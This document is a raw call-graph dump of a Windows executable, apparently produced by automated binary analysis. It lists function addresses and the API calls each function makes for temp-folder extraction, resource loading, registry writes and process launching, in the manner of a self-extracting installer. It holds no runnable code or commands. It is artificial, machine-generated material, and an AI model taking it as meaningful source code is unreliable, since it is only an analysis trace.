7ff71d1d27f1 2409->2413 2411 7ff71d1d269c 2410->2411 2412 7ff71d1d27dd 2410->2412 2414 7ff71d1d26a6 2411->2414 2415 7ff71d1d27c7 GetWindowsDirectoryA 2411->2415 2412->2409 2416 7ff71d1d2805 2413->2416 2417 7ff71d1d7ba8 CharPrevA 2413->2417 2420 7ff71d1d7ba8 CharPrevA 2414->2420 2415->2413 2418 7ff71d1d8470 7 API calls 2416->2418 2417->2416 2419 7ff71d1d2814 2418->2419 2419->2390 2421 7ff71d1d2705 RegOpenKeyExA 2420->2421 2421->2413 2422 7ff71d1d2738 RegQueryValueExA 2421->2422 2423 7ff71d1d27b4 RegCloseKey 2422->2423 2424 7ff71d1d276b 2422->2424 2423->2413 2425 7ff71d1d2774 ExpandEnvironmentStringsA 2424->2425 2426 7ff71d1d2792 2424->2426 2425->2426 2426->2423 2428 7ff71d1d1221 GetProcAddress 2427->2428 2429 7ff71d1d12bb 2427->2429 2431 7ff71d1d123f AllocateAndInitializeSid 2428->2431 2432 7ff71d1d12ac FreeLibrary 2428->2432 2430 7ff71d1d8470 7 API calls 2429->2430 2433 7ff71d1d12ca 2430->2433 2431->2432 2434 7ff71d1d1288 FreeSid 2431->2434 2432->2429 2433->2339 2433->2344 2434->2432 2437 7ff71d1d5050 7 API calls 2436->2437 2438 7ff71d1d60bf LocalAlloc 2437->2438 2439 7ff71d1d610b 2438->2439 2440 7ff71d1d60dd 2438->2440 2442 7ff71d1d5050 7 API calls 2439->2442 2441 7ff71d1d4dcc 24 API calls 2440->2441 2443 7ff71d1d60fb 2441->2443 2444 7ff71d1d611d 2442->2444 2657 7ff71d1d7700 GetLastError 2443->2657 2446 7ff71d1d6121 2444->2446 2447 7ff71d1d615a lstrcmpA 2444->2447 2450 7ff71d1d4dcc 24 API calls 2446->2450 2448 7ff71d1d6174 LocalFree 2447->2448 2449 7ff71d1d618a 2447->2449 2451 7ff71d1d3123 2448->2451 2452 7ff71d1d4dcc 24 API calls 2449->2452 2453 7ff71d1d613f LocalFree 2450->2453 2451->2161 2451->2162 2451->2203 2454 7ff71d1d61ac LocalFree 2452->2454 2453->2451 2455 7ff71d1d6100 2454->2455 2455->2451 2457 7ff71d1d5050 7 API calls 2456->2457 2458 7ff71d1d6001 2457->2458 2459 7ff71d1d6006 2458->2459 2460 7ff71d1d604a 2458->2460 2461 7ff71d1d4dcc 24 API calls 2459->2461 2462 7ff71d1d5050 7 API calls 2460->2462 2463 7ff71d1d6025 2461->2463 2464 7ff71d1d6063 2462->2464 2465 7ff71d1d3146 2463->2465 2466 7ff71d1d772c 13 API calls 2464->2466 2465->2203 2470 7ff71d1d66c4 2465->2470 2467 7ff71d1d606f 2466->2467 2467->2465 2468 7ff71d1d6073 2467->2468 2469 7ff71d1d4dcc 24 API calls 2468->2469 2469->2463 2471 7ff71d1d5050 7 API calls 2470->2471 2472 7ff71d1d6706 LocalAlloc 2471->2472 2473 7ff71d1d6756 2472->2473 2474 7ff71d1d6726 2472->2474 2475 7ff71d1d5050 7 API calls 2473->2475 2476 7ff71d1d4dcc 24 API calls 2474->2476 2477 7ff71d1d6768 2475->2477 2478 7ff71d1d6744 2476->2478 2479 7ff71d1d67a5 lstrcmpA LocalFree 2477->2479 2480 7ff71d1d676c 2477->2480 2682 7ff71d1d7700 GetLastError 2478->2682 2483 7ff71d1d67ec 2479->2483 2484 7ff71d1d6837 2479->2484 2482 7ff71d1d4dcc 24 API calls 2480->2482 2487 7ff71d1d678a LocalFree 2482->2487 2493 7ff71d1d64e4 53 API calls 2483->2493 2486 7ff71d1d6b14 2484->2486 2490 7ff71d1d684f GetTempPathA 2484->2490 2485 7ff71d1d6749 2488 7ff71d1d674f 2485->2488 2489 7ff71d1d7ac8 28 API calls 2486->2489 2487->2488 2491 7ff71d1d8470 7 API calls 2488->2491 2489->2488 2492 7ff71d1d6872 2490->2492 2500 7ff71d1d68a5 2490->2500 2494 7ff71d1d3153 2491->2494 2658 7ff71d1d64e4 2492->2658 2496 7ff71d1d680c 2493->2496 2494->2172 2494->2203 2496->2488 2498 7ff71d1d6814 2496->2498 2499 7ff71d1d4dcc 24 API calls 2498->2499 2499->2485 2500->2488 2501 7ff71d1d6adb GetWindowsDirectoryA 2500->2501 2502 7ff71d1d68f9 GetDriveTypeA 2500->2502 2506 7ff71d1d6ca4 38 API calls 2501->2506 2504 7ff71d1d6916 GetFileAttributesA 2502->2504 2517 7ff71d1d6911 2502->2517 2504->2517 2506->2500 2507 7ff71d1d64e4 53 API calls 2507->2500 2508 7ff71d1d6ca4 38 API calls 2508->2517 2509 7ff71d1d6955 GetDiskFreeSpaceA 2511 7ff71d1d6983 MulDiv 2509->2511 2509->2517 2510 7ff71d1d2468 25 API calls 2510->2517 2511->2517 2512 7ff71d1d6a02 GetWindowsDirectoryA 2512->2517 2513 7ff71d1d7ba8 CharPrevA 2514 7ff71d1d6a2a GetFileAttributesA 2513->2514 2515 7ff71d1d6a40 CreateDirectoryA 2514->2515 2514->2517 2515->2517 2516 7ff71d1d6a6d SetFileAttributesA 2516->2517 2517->2488 2517->2501 2517->2502 2517->2504 2517->2508 2517->2509 2517->2510 2517->2512 2517->2513 2517->2516 2518 7ff71d1d64e4 53 API calls 2517->2518 2518->2517 2520 7ff71d1d6d3f GetDiskFreeSpaceA 2519->2520 2521 7ff71d1d6d12 2519->2521 2522 7ff71d1d6f63 memset 2520->2522 2523 7ff71d1d6d80 MulDiv 2520->2523 2524 7ff71d1d4dcc 24 API calls 2521->2524 2736 7ff71d1d7700 GetLastError 2522->2736 2523->2522 2526 7ff71d1d6dae GetVolumeInformationA 2523->2526 2527 7ff71d1d6d2f 2524->2527 2529 7ff71d1d6e45 SetCurrentDirectoryA 2526->2529 2530 7ff71d1d6de6 memset 2526->2530 2717 7ff71d1d7700 GetLastError 2527->2717 2528 7ff71d1d6f7b GetLastError FormatMessageA 2532 7ff71d1d6fbd 2528->2532 2539 7ff71d1d6e6c 2529->2539 2718 7ff71d1d7700 GetLastError 2530->2718 2535 7ff71d1d4dcc 24 API calls 2532->2535 2534 7ff71d1d6d34 2544 7ff71d1d6f41 2534->2544 2537 7ff71d1d6fd8 SetCurrentDirectoryA 2535->2537 2536 7ff71d1d6dfe GetLastError FormatMessageA 2536->2532 2537->2544 2538 7ff71d1d8470 7 API calls 2540 7ff71d1d326f 2538->2540 2541 7ff71d1d6eb4 2539->2541 2542 7ff71d1d6ed8 2539->2542 2540->2179 2540->2203 2543 7ff71d1d4dcc 24 API calls 2541->2543 2542->2544 2719 7ff71d1d24f8 2542->2719 2543->2534 2544->2538 2547 7ff71d1d5050 7 API calls 2546->2547 2548 7ff71d1d5dab FindResourceA LoadResource LockResource 2547->2548 2549 7ff71d1d5fcf 2548->2549 2550 7ff71d1d5dfc 2548->2550 2549->2200 2551 7ff71d1d5e56 2550->2551 2552 7ff71d1d5e08 GetDlgItem ShowWindow GetDlgItem ShowWindow 2550->2552 2737 7ff71d1d5c60 #20 2551->2737 2552->2551 2555 7ff71d1d5e5f 2560 7ff71d1d4dcc 24 API calls 2555->2560 2556 7ff71d1d5e69 #20 2556->2555 2557 7ff71d1d5ed1 #22 2556->2557 2558 7ff71d1d5f55 2557->2558 2559 7ff71d1d5f15 #23 2557->2559 2562 7ff71d1d5f75 2558->2562 2563 7ff71d1d5f61 FreeResource 2558->2563 2559->2555 2559->2558 2561 7ff71d1d5f53 2560->2561 2561->2558 2564 7ff71d1d5f9f 2562->2564 2565 7ff71d1d5f81 2562->2565 2563->2562 2564->2549 2567 7ff71d1d5fb1 SendMessageA 2564->2567 2566 7ff71d1d4dcc 24 API calls 2565->2566 2566->2564 2567->2549 2569 7ff71d1d4118 2568->2569 2572 7ff71d1d412f 2568->2572 2570 7ff71d1d5050 7 API calls 2569->2570 2570->2572 2571 7ff71d1d4145 memset 2571->2572 2572->2571 2573 7ff71d1d4254 2572->2573 2574 7ff71d1d5050 7 API calls 2572->2574 2577 7ff71d1d44ee 2572->2577 2580 7ff71d1d42f5 CompareStringA 2572->2580 2581 7ff71d1d45d8 2572->2581 2582 7ff71d1d44df LocalFree 2572->2582 2584 7ff71d1d4599 2572->2584 2592 7ff71d1d44ad LocalFree 2572->2592 2595 7ff71d1d41fd CompareStringA 2572->2595 2611 7ff71d1d4394 2572->2611 2764 7ff71d1d1684 2572->2764 2803 7ff71d1d1d28 memset memset RegCreateKeyExA 2572->2803 2830 7ff71d1d473c CreateProcessA 2572->2830 2575 7ff71d1d4dcc 24 API calls 2573->2575 2574->2572 2610 7ff71d1d4273 2575->2610 2578 7ff71d1d8470 7 API calls 2577->2578 2579 7ff71d1d44ff 2578->2579 2579->2194 2580->2572 2580->2581 2581->2577 2583 7ff71d1d45f2 RegOpenKeyExA 2581->2583 2582->2577 2583->2577 2587 7ff71d1d4627 RegQueryValueExA 2583->2587 2586 7ff71d1d4dcc 24 API calls 2584->2586 2588 7ff71d1d45b8 LocalFree 2586->2588 2590 7ff71d1d471c RegCloseKey 2587->2590 2591 7ff71d1d466c memset GetSystemDirectoryA 2587->2591 2588->2577 2590->2577 2593 7ff71d1d46b3 2591->2593 2594 7ff71d1d469d 2591->2594 2592->2572 2592->2581 2597 7ff71d1d114c _vsnprintf 2593->2597 2598 7ff71d1d7ba8 CharPrevA 2594->2598 2595->2572 2599 7ff71d1d46dc RegSetValueExA 2597->2599 2598->2593 2599->2590 2600 7ff71d1d4574 2603 7ff71d1d4dcc 24 API calls 2600->2603 2601 7ff71d1d43a5 GetProcAddress 2602 7ff71d1d4521 2601->2602 2601->2611 2606 7ff71d1d4dcc 24 API calls 2602->2606 2605 7ff71d1d4597 2603->2605 2607 7ff71d1d4553 LocalFree 2605->2607 2608 7ff71d1d4544 FreeLibrary 2606->2608 2855 7ff71d1d7700 GetLastError 2607->2855 2608->2607 2610->2577 2611->2600 2611->2601 2612 7ff71d1d44d3 FreeLibrary 2611->2612 2613 7ff71d1d4480 FreeLibrary 2611->2613 2845 7ff71d1d79f0 2611->2845 2612->2582 2613->2592 2615 7ff71d1d5050 7 API calls 2614->2615 2616 7ff71d1d3f8b LocalAlloc 2615->2616 2617 7ff71d1d3fdd 2616->2617 2618 7ff71d1d3fad 2616->2618 2619 7ff71d1d5050 7 API calls 2617->2619 2620 7ff71d1d4dcc 24 API calls 2618->2620 2621 7ff71d1d3fef 2619->2621 2622 7ff71d1d3fcb 2620->2622 2623 7ff71d1d3ff3 2621->2623 2624 7ff71d1d4030 lstrcmpA 2621->2624 2892 7ff71d1d7700 GetLastError 2622->2892 2626 7ff71d1d4dcc 24 API calls 2623->2626 2627 7ff71d1d404e 2624->2627 2628 7ff71d1d4098 LocalFree 2624->2628 2630 7ff71d1d4011 LocalFree 2626->2630 2631 7ff71d1d7ac8 28 API calls 2627->2631 2629 7ff71d1d3139 2628->2629 2629->2161 2629->2203 2630->2629 2632 7ff71d1d406e LocalFree 2631->2632 2632->2629 2633->2196 2641 7ff71d1d778a 2634->2641 2635 7ff71d1d114c _vsnprintf 2636 7ff71d1d77df FindResourceA 2635->2636 2637 7ff71d1d7801 2636->2637 2638 7ff71d1d775e LoadResource LockResource 2636->2638 2639 7ff71d1d8470 7 API calls 2637->2639 2638->2637 2638->2641 2640 7ff71d1d782e 2639->2640 2640->2186 2641->2635 2642 7ff71d1d7803 FreeResource 2641->2642 2643 7ff71d1d77b8 FreeResource 2641->2643 2642->2637 2643->2641 2645 7ff71d1d5050 7 API calls 2644->2645 2646 7ff71d1d4967 LocalAlloc 2645->2646 2647 7ff71d1d49a9 2646->2647 2648 7ff71d1d4989 2646->2648 2650 7ff71d1d5050 7 API calls 2647->2650 2649 7ff71d1d4dcc 24 API calls 2648->2649 2651 7ff71d1d49a7 2649->2651 2652 7ff71d1d49bb 2650->2652 2651->2203 2653 7ff71d1d49d5 lstrcmpA 2652->2653 2654 7ff71d1d49bf 2652->2654 2653->2654 2655 7ff71d1d4a0e LocalFree 2653->2655 2656 7ff71d1d4dcc 24 API calls 2654->2656 2655->2651 2656->2655 2657->2455 2659 7ff71d1d6516 2658->2659 2662 7ff71d1d65dd 2658->2662 2689 7ff71d1d63b8 2659->2689 2661 7ff71d1d6688 2665 7ff71d1d8470 7 API calls 2661->2665 2700 7ff71d1d6b70 2662->2700 2669 7ff71d1d66a8 2665->2669 2667 7ff71d1d65cc 2672 7ff71d1d7ba8 CharPrevA 2667->2672 2668 7ff71d1d6577 GetSystemInfo 2680 7ff71d1d6591 2668->2680 2669->2488 2683 7ff71d1d2468 GetWindowsDirectoryA 2669->2683 2670 7ff71d1d6649 2670->2661 2675 7ff71d1d6ca4 38 API calls 2670->2675 2671 7ff71d1d662a CreateDirectoryA 2673 7ff71d1d663f 2671->2673 2674 7ff71d1d667d 2671->2674 2672->2662 2673->2670 2712 7ff71d1d7700 GetLastError 2674->2712 2678 7ff71d1d665a 2675->2678 2677 7ff71d1d7ba8 CharPrevA 2677->2667 2678->2661 2681 7ff71d1d6666 RemoveDirectoryA 2678->2681 2679 7ff71d1d6682 2679->2661 2680->2667 2680->2677 2681->2661 2682->2485 2684 7ff71d1d24c4 2683->2684 2685 7ff71d1d24a6 2683->2685 2686 7ff71d1d8470 7 API calls 2684->2686 2687 7ff71d1d4dcc 24 API calls 2685->2687 2688 7ff71d1d24df 2686->2688 2687->2684 2688->2500 2688->2507 2691 7ff71d1d63e3 2689->2691 2692 7ff71d1d7ba8 CharPrevA 2691->2692 2695 7ff71d1d644b GetTempFileNameA 2691->2695 2713 7ff71d1d114c 2691->2713 2693 7ff71d1d6420 RemoveDirectoryA GetFileAttributesA 2692->2693 2693->2691 2694 7ff71d1d64b6 CreateDirectoryA 2693->2694 2694->2695 2696 7ff71d1d6490 2694->2696 2695->2696 2697 7ff71d1d646b DeleteFileA CreateDirectoryA 2695->2697 2698 7ff71d1d8470 7 API calls 2696->2698 2697->2696 2699 7ff71d1d64a2 2698->2699 2699->2661 2699->2667 2699->2668 2701 7ff71d1d6b8b 2700->2701 2701->2701 2702 7ff71d1d6b94 LocalAlloc 2701->2702 2703 7ff71d1d6bb4 2702->2703 2704 7ff71d1d6bf5 2702->2704 2705 7ff71d1d4dcc 24 API calls 2703->2705 2707 7ff71d1d7ba8 CharPrevA 2704->2707 2711 7ff71d1d6bd2 2705->2711 2708 7ff71d1d6c14 CreateFileA LocalFree 2707->2708 2710 7ff71d1d6c61 CloseHandle GetFileAttributesA 2708->2710 2708->2711 2709 7ff71d1d6626 2709->2670 2709->2671 2710->2711 2711->2709 2716 7ff71d1d7700 GetLastError 2711->2716 2712->2679 2714 7ff71d1d1178 _vsnprintf 2713->2714 2715 7ff71d1d1199 2713->2715 2714->2715 2715->2691 2716->2709 2717->2534 2718->2536 2720 7ff71d1d2525 2719->2720 2721 7ff71d1d2562 2719->2721 2722 7ff71d1d114c _vsnprintf 2720->2722 2723 7ff71d1d25ab 2721->2723 2724 7ff71d1d2567 2721->2724 2725 7ff71d1d253d 2722->2725 2727 7ff71d1d114c _vsnprintf 2723->2727 2735 7ff71d1d255d 2723->2735 2726 7ff71d1d114c _vsnprintf 2724->2726 2728 7ff71d1d4dcc 24 API calls 2725->2728 2730 7ff71d1d257f 2726->2730 2731 7ff71d1d25c7 2727->2731 2728->2735 2729 7ff71d1d8470 7 API calls 2732 7ff71d1d2609 2729->2732 2733 7ff71d1d4dcc 24 API calls 2730->2733 2734 7ff71d1d4dcc 24 API calls 2731->2734 2732->2544 2733->2735 2734->2735 2735->2729 2736->2528 2738 7ff71d1d5ced 2737->2738 2748 7ff71d1d5d62 2737->2748 2749 7ff71d1d5380 2738->2749 2740 7ff71d1d8470 7 API calls 2743 7ff71d1d5d78 2740->2743 2742 7ff71d1d5d0d #21 2744 7ff71d1d5d28 2742->2744 2742->2748 2743->2555 2743->2556 2744->2748 2761 7ff71d1d5770 2744->2761 2747 7ff71d1d5d4f #23 2747->2748 2748->2740 2750 7ff71d1d53b3 2749->2750 2751 7ff71d1d53d0 2750->2751 2752 7ff71d1d53fd lstrcmpA 2750->2752 2753 7ff71d1d4dcc 24 API calls 2751->2753 2754 7ff71d1d53f4 2752->2754 2755 7ff71d1d5454 2752->2755 2753->2754 2754->2742 2754->2748 2755->2754 2756 7ff71d1d54a8 CreateFileA 2755->2756 2756->2754 2758 7ff71d1d54de 2756->2758 2757 7ff71d1d5561 CreateFileA 2757->2754 2758->2754 2758->2757 2759 7ff71d1d5549 CharNextA 2758->2759 2760 7ff71d1d5532 CreateDirectoryA 2758->2760 2759->2758 2760->2759 2762 7ff71d1d57a4 CloseHandle 2761->2762 2763 7ff71d1d578f 2761->2763 2762->2763 2763->2747 2763->2748 2765 7ff71d1d16d3 2764->2765 2856 7ff71d1d15e8 2765->2856 2768 7ff71d1d7ba8 CharPrevA 2770 7ff71d1d1766 2768->2770 2769 7ff71d1d7d68 2 API calls 2771 7ff71d1d1811 2769->2771 2770->2769 2772 7ff71d1d1a1b 2771->2772 2773 7ff71d1d181a CompareStringA 2771->2773 2774 7ff71d1d7d68 2 API calls 2772->2774 2773->2772 2775 7ff71d1d184d GetFileAttributesA 2773->2775 2776 7ff71d1d1a28 2774->2776 2777 7ff71d1d19f3 2775->2777 2778 7ff71d1d1867 2775->2778 2779 7ff71d1d1a31 CompareStringA 2776->2779 2780 7ff71d1d1acb LocalAlloc 2776->2780 2781 7ff71d1d4dcc 24 API calls 2777->2781 2778->2777 2783 7ff71d1d15e8 2 API calls 2778->2783 2779->2780 2790 7ff71d1d1a60 2779->2790 2780->2777 2782 7ff71d1d1aeb GetFileAttributesA 2780->2782 2801 7ff71d1d194f 2781->2801 2795 7ff71d1d1b01 2782->2795 2784 7ff71d1d188b 2783->2784 2785 7ff71d1d18b5 LocalAlloc 2784->2785 2787 7ff71d1d15e8 2 API calls 2784->2787 2785->2777 2788 7ff71d1d18d7 GetPrivateProfileIntA GetPrivateProfileStringA 2785->2788 2786 7ff71d1d1bd1 2789 7ff71d1d8470 7 API calls 2786->2789 2787->2785 2791 7ff71d1d1984 2788->2791 2788->2801 2792 7ff71d1d1be9 2789->2792 2790->2790 2793 7ff71d1d1a81 LocalAlloc 2790->2793 2796 7ff71d1d1995 GetShortPathNameA 2791->2796 2797 7ff71d1d19ba 2791->2797 2792->2572 2793->2777 2798 7ff71d1d1ab2 2793->2798 2802 7ff71d1d1b54 2795->2802 2796->2797 2800 7ff71d1d114c _vsnprintf 2797->2800 2799 7ff71d1d114c _vsnprintf 2798->2799 2799->2801 2800->2801 2801->2786 2864 7ff71d1d2a6c 2802->2864 2804 7ff71d1d2019 2803->2804 2810 7ff71d1d1dce 2803->2810 2805 7ff71d1d8470 7 API calls 2804->2805 2807 7ff71d1d2028 2805->2807 2806 7ff71d1d114c _vsnprintf 2808 7ff71d1d1dee RegQueryValueExA 2806->2808 2807->2572 2809 7ff71d1d1e25 2808->2809 2808->2810 2811 7ff71d1d1e46 GetSystemDirectoryA 2809->2811 2812 7ff71d1d1e29 RegCloseKey 2809->2812 2810->2806 2810->2809 2813 7ff71d1d7ba8 CharPrevA 2811->2813 2812->2804 2814 7ff71d1d1e6a LoadLibraryA 2813->2814 2815 7ff71d1d1f55 GetModuleFileNameA 2814->2815 2816 7ff71d1d1e86 GetProcAddress FreeLibrary 2814->2816 2817 7ff71d1d1f78 RegCloseKey 2815->2817 2821 7ff71d1d1ee8 2815->2821 2816->2815 2818 7ff71d1d1ebe GetSystemDirectoryA 2816->2818 2817->2804 2819 7ff71d1d1ed5 2818->2819 2818->2821 2820 7ff71d1d7ba8 CharPrevA 2819->2820 2820->2821 2821->2821 2822 7ff71d1d1f11 LocalAlloc 2821->2822 2823 7ff71d1d1f35 2822->2823 2824 7ff71d1d1f8e 2822->2824 2825 7ff71d1d4dcc 24 API calls 2823->2825 2826 7ff71d1d114c _vsnprintf 2824->2826 2827 7ff71d1d1f53 2825->2827 2828 7ff71d1d1fc4 2826->2828 2827->2817 2828->2828 2829 7ff71d1d1fcd RegSetValueExA RegCloseKey LocalFree 2828->2829 2829->2804 2831 7ff71d1d48b3 2830->2831 2832 7ff71d1d47c2 WaitForSingleObject GetExitCodeProcess 2830->2832 2891 7ff71d1d7700 GetLastError 2831->2891 2833 7ff71d1d47f9 2832->2833 2840 7ff71d1d2318 18 API calls 2833->2840 2844 7ff71d1d482a CloseHandle CloseHandle 2833->2844 2835 7ff71d1d48b8 GetLastError FormatMessageA 2836 7ff71d1d4dcc 24 API calls 2835->2836 2838 7ff71d1d491c 2836->2838 2841 7ff71d1d8470 7 API calls 2838->2841 2839 7ff71d1d48aa 2839->2838 2842 7ff71d1d484d 2840->2842 2843 7ff71d1d492f 2841->2843 2842->2844 2843->2572 2844->2838 2844->2839 2846 7ff71d1d7a25 2845->2846 2847 7ff71d1d7ba8 CharPrevA 2846->2847 2848 7ff71d1d7a63 GetFileAttributesA 2847->2848 2849 7ff71d1d7a96 LoadLibraryA 2848->2849 2850 7ff71d1d7a79 2848->2850 2851 7ff71d1d7aa9 2849->2851 2850->2849 2852 7ff71d1d7a7d LoadLibraryExA 2850->2852 2853 7ff71d1d8470 7 API calls 2851->2853 2852->2851 2854 7ff71d1d7ab9 2853->2854 2854->2611 2855->2610 2857 7ff71d1d1609 2856->2857 2859 7ff71d1d1621 2857->2859 2861 7ff71d1d1651 2857->2861 2877 7ff71d1d7ce8 2857->2877 2860 7ff71d1d7ce8 2 API calls 2859->2860 2862 7ff71d1d162f 2860->2862 2861->2768 2861->2770 2862->2861 2863 7ff71d1d7ce8 2 API calls 2862->2863 2863->2862 2865 7ff71d1d2aa0 GetModuleFileNameA 2864->2865 2866 7ff71d1d2c24 2864->2866 2865->2866 2875 7ff71d1d2ac8 2865->2875 2867 7ff71d1d8470 7 API calls 2866->2867 2869 7ff71d1d2c37 2867->2869 2868 7ff71d1d2acc IsDBCSLeadByte 2868->2875 2869->2786 2870 7ff71d1d2bf6 CharNextA 2872 7ff71d1d2c08 CharNextA 2870->2872 2871 7ff71d1d2af1 CharNextA CharUpperA 2873 7ff71d1d2b9b CharUpperA 2871->2873 2871->2875 2872->2866 2872->2868 2873->2875 2875->2868 2875->2870 2875->2871 2875->2872 2875->2875 2876 7ff71d1d2b36 CharPrevA 2875->2876 2882 7ff71d1d7c40 2875->2882 2876->2875 2880 7ff71d1d7d00 2877->2880 2878 7ff71d1d7d47 2878->2857 2879 7ff71d1d7d0a IsDBCSLeadByte 2879->2878 2879->2880 2880->2878 2880->2879 2881 7ff71d1d7d30 CharNextA 2880->2881 2881->2880 2883 7ff71d1d7c58 2882->2883 2883->2883 2884 7ff71d1d7c61 CharPrevA 2883->2884 2885 7ff71d1d7c7d CharPrevA 2884->2885 2886 7ff71d1d7c94 2885->2886 2887 7ff71d1d7c75 2885->2887 2888 7ff71d1d7cb5 CharNextA 2886->2888 2889 7ff71d1d7c9e CharPrevA 2886->2889 2890 7ff71d1d7cc7 2886->2890 2887->2885 2887->2886 2888->2890 2889->2888 2889->2890 2890->2875 2891->2835 2892->2629 2894 7ff71d1d2281 2893->2894 2895 7ff71d1d22eb 2893->2895 2896 7ff71d1d7ba8 CharPrevA 2894->2896 2897 7ff71d1d8470 7 API calls 2895->2897 2898 7ff71d1d2294 WritePrivateProfileStringA _lopen 2896->2898 2899 7ff71d1d22fd 2897->2899 2898->2895 2900 7ff71d1d22c7 _llseek _lclose 2898->2900 2899->2225 2900->2895 2956 7ff71d1d3840 2957 7ff71d1d3852 2956->2957 2959 7ff71d1d385a 2956->2959 2958 7ff71d1d388e GetDesktopWindow 2957->2958 2957->2959 2964 7ff71d1d4c68 6 API calls 2958->2964 2960 7ff71d1d38ec EndDialog 2959->2960 2961 7ff71d1d385f 2959->2961 2960->2961 2965 7ff71d1d4d3f SetWindowPos 2964->2965 2967 7ff71d1d8470 7 API calls 2965->2967 2968 7ff71d1d38a5 SetWindowTextA SetDlgItemTextA SetForegroundWindow 2967->2968 2968->2961 2969 7ff71d1d1500 2970 7ff71d1d1530 2969->2970 2971 7ff71d1d1557 GetDesktopWindow 2969->2971 2973 7ff71d1d1542 EndDialog 2970->2973 2974 7ff71d1d1553 2970->2974 2972 7ff71d1d4c68 14 API calls 2971->2972 2975 7ff71d1d156e LoadStringA SetDlgItemTextA MessageBeep 2972->2975 2973->2974 2976 7ff71d1d8470 7 API calls 2974->2976 2975->2974 2977 7ff71d1d15d0 2976->2977 2994 7ff71d1d8750 2995 7ff71d1d875f 2994->2995 2996 7ff71d1d8782 2994->2996 2995->2996 2997 7ff71d1d877b ?terminate@ 2995->2997 2997->2996 2998 7ff71d1d8790 SetUnhandledExceptionFilter 2901 7ff71d1d5690 2908 7ff71d1d3b40 2901->2908 2904 7ff71d1d56c2 WriteFile 2905 7ff71d1d56ba 2904->2905 2906 7ff71d1d56f9 2904->2906 2906->2905 2907 7ff71d1d5725 SendDlgItemMessageA 2906->2907 2907->2905 2909 7ff71d1d3b4c MsgWaitForMultipleObjects 2908->2909 2910 7ff71d1d3b74 PeekMessageA 2909->2910 2911 7ff71d1d3be5 2909->2911 2910->2909 2912 7ff71d1d3b99 2910->2912 2911->2904 2911->2905 2912->2909 2912->2911 2913 7ff71d1d3ba7 DispatchMessageA 2912->2913 2914 7ff71d1d3bb8 PeekMessageA 2912->2914 2913->2914 2914->2912 3001 7ff71d1d80d0 3002 7ff71d1d80e2 3001->3002 3008 7ff71d1d8818 GetModuleHandleW 3002->3008 3004 7ff71d1d8149 __set_app_type 3005 7ff71d1d8186 3004->3005 3006 7ff71d1d818f __setusermatherr 3005->3006 3007 7ff71d1d819c 3005->3007 3006->3007 3009 7ff71d1d882d 3008->3009 3009->3004 3010 7ff71d1d3910 3011 7ff71d1d3933 3010->3011 3012 7ff71d1d3a09 3010->3012 3011->3012 3013 7ff71d1d3a11 GetDesktopWindow 3011->3013 3014 7ff71d1d3948 3011->3014 3015 7ff71d1d3954 3012->3015 3016 7ff71d1d3b1a EndDialog 3012->3016 3017 7ff71d1d4c68 14 API calls 3013->3017 3018 7ff71d1d397b 3014->3018 3019 7ff71d1d394c 3014->3019 3016->3015 3020 7ff71d1d3a2f 3017->3020 3018->3015 3022 7ff71d1d3985 ResetEvent 3018->3022 3019->3015 3021 7ff71d1d395b TerminateThread 3019->3021 3023 7ff71d1d3a9b SetWindowTextA CreateThread 3020->3023 3024 7ff71d1d3a38 GetDlgItem SendMessageA GetDlgItem SendMessageA 3020->3024 3021->3016 3025 7ff71d1d4dcc 24 API calls 3022->3025 3023->3015 3026 7ff71d1d3ae8 3023->3026 3024->3023 3027 7ff71d1d39c3 3025->3027 3028 7ff71d1d4dcc 24 API calls 3026->3028 3029 7ff71d1d39e4 SetEvent 3027->3029 3031 7ff71d1d39cc SetEvent 3027->3031 3028->3012 3030 7ff71d1d3b40 4 API calls 3029->3030 3030->3012 3031->3015 2978 7ff71d1d33a0 2979 7ff71d1d33bb CallWindowProcA 2978->2979 2980 7ff71d1d33ac 2978->2980 2981 7ff71d1d33b7 2979->2981 2980->2979 2980->2981 2982 7ff71d1d55e0 2983 7ff71d1d5641 ReadFile 2982->2983 2984 7ff71d1d560d 2982->2984 2983->2984 2985 7ff71d1d57e0 2986 7ff71d1d581e 2985->2986 2988 7ff71d1d57fc 2985->2988 2987 7ff71d1d583d SetFilePointer 2986->2987 2986->2988 2987->2988 2989 7ff71d1d8417 2990 7ff71d1d8426 _exit 2989->2990 2991 7ff71d1d842f 2989->2991 2990->2991 2992 7ff71d1d8444 2991->2992 2993 7ff71d1d8438 _cexit 2991->2993 2993->2992 2999 7ff71d1d8b30 _XcptFilter 3000 7ff71d1d81b0 __getmainargs 2915 7ff71d1d58b0 2916 7ff71d1d5904 2915->2916 2917 7ff71d1d58ee 2915->2917 2920 7ff71d1d5a29 2916->2920 2922 7ff71d1d58fc 2916->2922 2925 7ff71d1d591a 2916->2925 2918 7ff71d1d5770 CloseHandle 2917->2918 2917->2922 2918->2922 2919 7ff71d1d8470 7 API calls 2921 7ff71d1d5af4 2919->2921 2923 7ff71d1d5a35 SetDlgItemTextA 2920->2923 2924 7ff71d1d5a4a 2920->2924 2922->2919 2923->2924 2924->2922 2940 7ff71d1d51bc GetFileAttributesA 2924->2940 2925->2922 2926 7ff71d1d5982 DosDateTimeToFileTime 2925->2926 2926->2922 2928 7ff71d1d59a3 LocalFileTimeToFileTime 2926->2928 2928->2922 2930 7ff71d1d59c1 SetFileTime 2928->2930 2930->2922 2931 7ff71d1d59e9 2930->2931 2933 7ff71d1d5770 CloseHandle 2931->2933 2932 7ff71d1d5380 29 API calls 2934 7ff71d1d5ab5 2932->2934 2935 7ff71d1d59f2 SetFileAttributesA 2933->2935 2934->2922 2936 7ff71d1d5ac1 2934->2936 2935->2922 2947 7ff71d1d527c LocalAlloc 2936->2947 2939 7ff71d1d5acb 2939->2922 2941 7ff71d1d525f 2940->2941 2942 7ff71d1d51de 2940->2942 2941->2922 2941->2932 2942->2941 2943 7ff71d1d5246 SetFileAttributesA 2942->2943 2944 7ff71d1d7ac8 28 API calls 2942->2944 2943->2941 2945 7ff71d1d5228 2944->2945 2945->2941 2945->2943 2946 7ff71d1d523c 2945->2946 2946->2943 2948 7ff71d1d52aa 2947->2948 2950 7ff71d1d52d4 2947->2950 2949 7ff71d1d4dcc 24 API calls 2948->2949 2951 7ff71d1d52cd 2949->2951 2950->2950 2952 7ff71d1d52e4 LocalAlloc 2950->2952 2951->2939 2952->2951 2953 7ff71d1d5300 2952->2953 2954 7ff71d1d4dcc 24 API calls 2953->2954 2955 7ff71d1d5323 LocalFree 2954->2955 2955->2951 3032 7ff71d1d4a30 3033 7ff71d1d4a50 3032->3033 3034 7ff71d1d4a39 SendMessageA 3032->3034 3034->3033 3035 7ff71d1d3530 3036 7ff71d1d3802 EndDialog 